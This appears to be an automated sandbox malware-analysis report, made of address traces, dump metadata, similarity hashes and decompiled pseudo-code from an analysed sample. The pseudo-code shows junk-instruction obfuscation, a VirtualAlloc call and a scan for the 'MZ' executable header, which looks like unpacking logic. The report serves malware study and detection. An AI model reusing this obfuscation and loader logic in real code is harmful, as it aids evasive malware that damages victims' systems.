0x00402747
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e7
0x004028e8
0x004028ea
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c05751fd3f50ac3be453005019c92b001ff117a0d08366f3d035e22e2b2828cd
Instruction ID: f1ed78140641747c0422911d2abba5cd3ac4fc29bfed0b45742d41cfb1de1f9a
Opcode Fuzzy Hash: c05751fd3f50ac3be453005019c92b001ff117a0d08366f3d035e22e2b2828cd
Instruction Fuzzy Hash: BD81AC5193EB44CAD217293086486715A48FF97347331EB7F89A7B50E166BE0E8B348E

Uniqueness

Uniqueness Score: -1.00%

Function 004026FA, Relevance: 1.7, APIs: 1, Instructions: 435memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0cec1783607d7bf08c9cfa633a8ca7fc51e9c0fd18912e3df7c1b9b693e8ab0b
Instruction ID: 57b6f1e0cdc0066792b61ac3636e995cdfa8cd0d6c7d43af3b3b197cc909c8b0
Opcode Fuzzy Hash: 0cec1783607d7bf08c9cfa633a8ca7fc51e9c0fd18912e3df7c1b9b693e8ab0b
Instruction Fuzzy Hash: 5781AE5193EB44CAD217293086486715A48FF97343331EB7F85A7B60E1667E0E8B74CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402564, Relevance: 1.7, APIs: 1, Instructions: 428
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 38%

			E00402564(void* __eax, unsigned char __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t60;
				void* _t61;
				intOrPtr* _t64;
				void* _t66;
				void* _t68;
				unsigned char _t106;
				void* _t127;
				void* _t129;
				void* _t131;
				void* _t132;
				void* _t143;
				void* _t144;
				void* _t168;
				void* _t169;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t197;
				void* _t198;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t224;
				void* _t226;
				void* _t227;
				void* _t287;
				signed long long _t306;
				void* _t307;
				void* _t308;

				_t224 = __esi;
				_t168 = __edx;
				_t106 = __ebx;
				_t60 = __eax;
				asm("in eax, 0x35");
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *__ecx =  *__ecx + __eax;
				 *((intOrPtr*)(__edi + 0x47)) =  *((intOrPtr*)(__edi + 0x47)) + __ecx;
				_t197 = __edi - 1 + 1;
				_t127 = __ecx - 0x2a34a;
				asm("movq mm7, mm1");
				asm("fclex");
				_t129 = _t127 - 1 + 1;
				_t198 = _t197 - 1;
				asm("fprem1");
				asm("fldpi");
				_t199 = _t198 + 1;
				asm("clc");
				asm("fyl2x");
				_t306 = __fp0 - st6;
				do {
					asm("fnop");
					_t169 = _t168 - 1;
					asm("punpcklwd xmm5, xmm3");
					asm("fprem");
					_t168 = _t169 + 1;
					asm("wait");
					asm("fninit");
					_t306 = _t306 / st5;
					asm("pcmpgtd mm4, mm0");
					_t131 = _t129 - 1 + 1;
					_t200 = _t199 - 1;
					asm("pxor mm6, mm4");
					asm("fdivr st7, st0");
					_t201 = _t200 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t106 = _t106 >> 0x3f;
					asm("aas");
					_t61 = _t60 - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					_t60 = _t61 + 1;
					asm("clc");
					_t132 = _t131 - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					_t129 = _t132 - 1 + 1;
					_t202 = _t201 - 1;
					asm("wait");
					asm("fyl2xp1");
					_t199 = _t202 + 1;
				} while (_t129 != 0);
				asm("wait");
				asm("fclex");
				asm("packsswb mm5, mm1");
				asm("fldl2t");
				asm("paddd xmm2, xmm0");
				_t64 = __imp__#690;
				asm("clc");
				asm("fst st1");
				asm("fdivrp st3, st0");
				_t203 = _t199 - 1;
				asm("psubusb xmm4, xmm5");
				asm("psraw xmm0, xmm3");
				_t204 = _t203 + 1;
				asm("packuswb xmm3, xmm5");
				asm("fyl2x");
				asm("fclex");
				asm("psrlq xmm7, 0xf4");
				asm("clc");
				_t307 = _t306 - st3;
				asm("f2xm1");
				_t171 = _t168 - 1 + 1;
				asm("fcomp st0, st3");
				asm("emms");
				asm("cld");
				asm("fclex");
				asm("wait");
				_t143 = 0x905a4d;
				_t226 = _t224 - 1 + 1;
				asm("fprem1");
				asm("wait");
				asm("fclex");
				asm("clc");
				do {
					_t227 = _t226 - 1;
					asm("paddusw xmm1, xmm7");
					asm("fldl2t");
					_t226 = _t227 + 1;
					_t66 = _t64 - 1 + 1;
					asm("fldl2e");
					asm("fst st1");
					_t64 = _t66 - 1;
					asm("clc");
					_t144 = _t143 - 1;
					asm("fnop");
					asm("psubusb xmm4, xmm5");
					_t143 = _t144 + 1;
					_t287 =  *_t64 - _t143;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
					asm("invalid");
				} while (_t287 != 0);
				_t172 = _t171 - 1;
				asm("fsin");
				asm("fclex");
				_t173 = _t172 + 1;
				_t68 = _t64 - 1 + 1;
				asm("fldz");
				_t308 = _t307 - st3;
				_t206 = _t204 - 1 + 1;
				asm("pcmpgtw mm6, mm2");
				asm("fcomp st0, st3");
				asm("clc");
				asm("cld");
				asm("fxch st0, st1");
				asm("fclex");
				_t208 = _t206 - 1 + 1;
				asm("fdecstp");
				asm("fprem1");
				_t209 = _t208 - 1;
				_t210 = _t209 + 1;
				asm("pcmpeqb mm3, mm6");
				asm("paddusw xmm1, xmm7");
				asm("int1");
				if (0x45f5 <= 0) goto L56;
				_push(es);
			}

0x00402564
0x00402564
0x00402564
0x00402564
0x00402564
0x00402567
0x00402569
0x0040256b
0x0040256d
0x0040256f
0x00402571
0x00402573
0x00402575
0x00402577
0x00402579
0x0040257b
0x0040257d
0x0040257f
0x00402581
0x00402583
0x00402585
0x00402587
0x00402589
0x0040258b
0x0040258d
0x0040258f
0x00402591
0x00402593
0x00402595
0x00402597
0x00402599
0x0040259b
0x0040259d
0x0040259f
0x004025a1
0x004025a3
0x004025a5
0x004025a7
0x004025a9
0x004025ab
0x004025ad
0x004025ae
0x004025b4
0x004025b7
0x00402601
0x00402602
0x00402603
0x00402605
0x0040264e
0x0040264f
0x00402651
0x00402653
0x00402699
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e7
0x004028e8
0x004028ea
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 54d38abd74d0e628f168f9e14daaebc3ebe57c26451e85e79e8450fdbf841dd1
Instruction ID: 89f6e3797dd89b7f93a7dedb6d2cc5719358ecc57451b4c85656afcaff77d9b5
Opcode Fuzzy Hash: 54d38abd74d0e628f168f9e14daaebc3ebe57c26451e85e79e8450fdbf841dd1
Instruction Fuzzy Hash: DB81AC5193EB44CAD217293482486715A48FF97347330EF7F85A7B50E166BE0E8B348E

Uniqueness

Uniqueness Score: -1.00%

Function 004025BC, Relevance: 1.7, APIs: 1, Instructions: 421memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bdcd550937b8e9dec876b741773b650969f70df14f3f61694cebbdb9195e82b8
Instruction ID: e2e80e36a4b4e7030ca5951c3613c49477bcb34e17669d04566eae466e7f5b71
Opcode Fuzzy Hash: bdcd550937b8e9dec876b741773b650969f70df14f3f61694cebbdb9195e82b8
Instruction Fuzzy Hash: 7181AB5193EA44CAD217293486486715A48FF97343331EF7F85A7B50E266BE0E8B348E

Uniqueness

Uniqueness Score: -1.00%

Function 004027C8, Relevance: 1.6, APIs: 1, Instructions: 367
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E004027C8(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;

				_t59 = __ebx;
				while(1) {
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						__edi = __edi + 1;
						__eflags = __edi;
						asm("clc");
						asm("fabs");
						asm("loope 0x68");
						asm("paddb xmm0, xmm0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L55;
					_push(es);
				}
			}

0x004027c8
0x004027a1
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x00000000
0x004027a0
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6780f8cb6d7e6ba5241ee9660a6830b54ec9f72b7a1c28b0b414a7a94bd02418
Instruction ID: da6012486b913e954932229663cfbc483b784a52830b51b45ce8c4de13f1f526
Opcode Fuzzy Hash: 6780f8cb6d7e6ba5241ee9660a6830b54ec9f72b7a1c28b0b414a7a94bd02418
Instruction Fuzzy Hash: E681AE5192EA44C6D217293086486715A48FF97343730EB7F89A7B60E166BE0E4B748F

Uniqueness

Uniqueness Score: -1.00%

Function 004027B6, Relevance: 1.6, APIs: 1, Instructions: 365
COMMONCrypto

Download Yara Rule

C-Code - Quality: 36%

			E004027B6(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {

				while(1) {
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						__edi = __edi + 1;
						__eflags = __edi;
						asm("clc");
						asm("fabs");
						asm("loope 0x68");
						asm("paddb xmm0, xmm0");
						asm("paddb mm0, mm0");
						asm("cld");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L54;
					_push(es);
				}
			}

0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x00000000
0x004027a2
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7066376e8875ab9093711616a9069843cdf633fd1d55a7fc6db96df478019898
Instruction ID: c5b9a8e5180019d5cff42e2fbc7a935e2ef4ad78b5b8200dc49613220ac24752
Opcode Fuzzy Hash: 7066376e8875ab9093711616a9069843cdf633fd1d55a7fc6db96df478019898
Instruction Fuzzy Hash: F081A05193EA44C6D217293086486715A48FF97343730EB7F89A7760E1667E0E4B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004028EF, Relevance: 1.6, APIs: 1, Instructions: 363
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 17%

			E004028EF(signed int* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __fp0) {
				intOrPtr* _t61;
				void* _t63;
				void* _t65;
				void* _t133;
				void* _t134;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t185;
				void* _t186;
				void* _t188;
				void* _t190;
				void* _t191;
				void* _t192;
				signed int _t241;
				void* _t243;
				void* _t244;
				void* _t300;
				void* _t319;
				void* _t320;

				_t241 = __esi ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx ^  *__ebx;
				asm("fldl2t");
				asm("paddd xmm2, xmm0");
				_t61 = __imp__#690;
				asm("clc");
				asm("fst st1");
				asm("fdivrp st3, st0");
				_t185 = __edi - 1;
				asm("psubusb xmm4, xmm5");
				asm("psraw xmm0, xmm3");
				_t186 = _t185 + 1;
				asm("packuswb xmm3, xmm5");
				asm("fyl2x");
				asm("fclex");
				asm("psrlq xmm7, 0xf4");
				asm("clc");
				_t319 = __fp0 - st3;
				asm("f2xm1");
				_t160 = __edx - 1 + 1;
				asm("fcomp st0, st3");
				asm("emms");
				asm("cld");
				asm("fclex");
				asm("wait");
				_t133 = 0x905a4d;
				_t243 = _t241 - 1 + 1;
				asm("fprem1");
				asm("wait");
				asm("fclex");
				asm("clc");
				do {
					_t244 = _t243 - 1;
					asm("paddusw xmm1, xmm7");
					asm("fldl2t");
					_t243 = _t244 + 1;
					_t63 = _t61 - 1 + 1;
					asm("fldl2e");
					asm("fst st1");
					_t61 = _t63 - 1;
					asm("clc");
					_t134 = _t133 - 1;
					asm("fnop");
					asm("psubusb xmm4, xmm5");
					_t133 = _t134 + 1;
					_t300 =  *_t61 - _t133;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
